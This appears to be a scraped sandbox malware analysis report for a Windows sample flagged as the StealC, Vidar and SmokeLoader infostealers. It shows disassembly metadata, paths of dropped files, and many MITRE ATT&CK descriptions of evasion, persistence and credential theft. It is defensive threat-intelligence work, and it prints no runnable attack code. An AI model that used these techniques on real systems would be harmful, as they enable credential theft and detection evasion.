API ID: DestroyIcon
String ID: ,z$SZ
API String ID: 1234817797-2661083866
Opcode ID: 094cf283565da960aeecfb5399b64074fab89c32223936fd15cbc83573ee1b47
Instruction ID: dbadbf6003e265a2c58922de27964bfd949cb82d5f9b88b072fee76b2cd0478a
Opcode Fuzzy Hash: 094cf283565da960aeecfb5399b64074fab89c32223936fd15cbc83573ee1b47
Instruction Fuzzy Hash: 44E0C233014286EFE7241F0AD808795FFE8AF21321F248026E08066250D3B169A0CB90

Function 00E89EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00E89EB5
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00E89ECC

Strings

aut, xrefs: 00E89EC6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: aef712d41b56c21efe306f812ed526f6376fb3b0fe801395bdd2f60736bd37a1
Instruction ID: 90358f3ee366f2102c57de28f077fb9bdedd31b09b628268e74d7b2656bdfeb9
Opcode Fuzzy Hash: aef712d41b56c21efe306f812ed526f6376fb3b0fe801395bdd2f60736bd37a1
Instruction Fuzzy Hash: 12D0177554030DABDA50AA90DC0EF9BBB2CDB04700F0042A2BB58A11B2EA7165998A91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report h8jGj6Qe78.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\FCAAEBFHJJDAAKFIECGDBKJDGI

C:\ProgramData\GCBGIIEC

C:\ProgramData\IDBKFHJEBAAEBGDGDBFB

C:\ProgramData\IECFHDBA

C:\ProgramData\JJDHIDBFBFHIJKFHCGIEGIDAEH

C:\ProgramData\JKKECBGIIIEBGCBGIDHDGCAKJE

Windows Analysis Report
h8jGj6Qe78.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre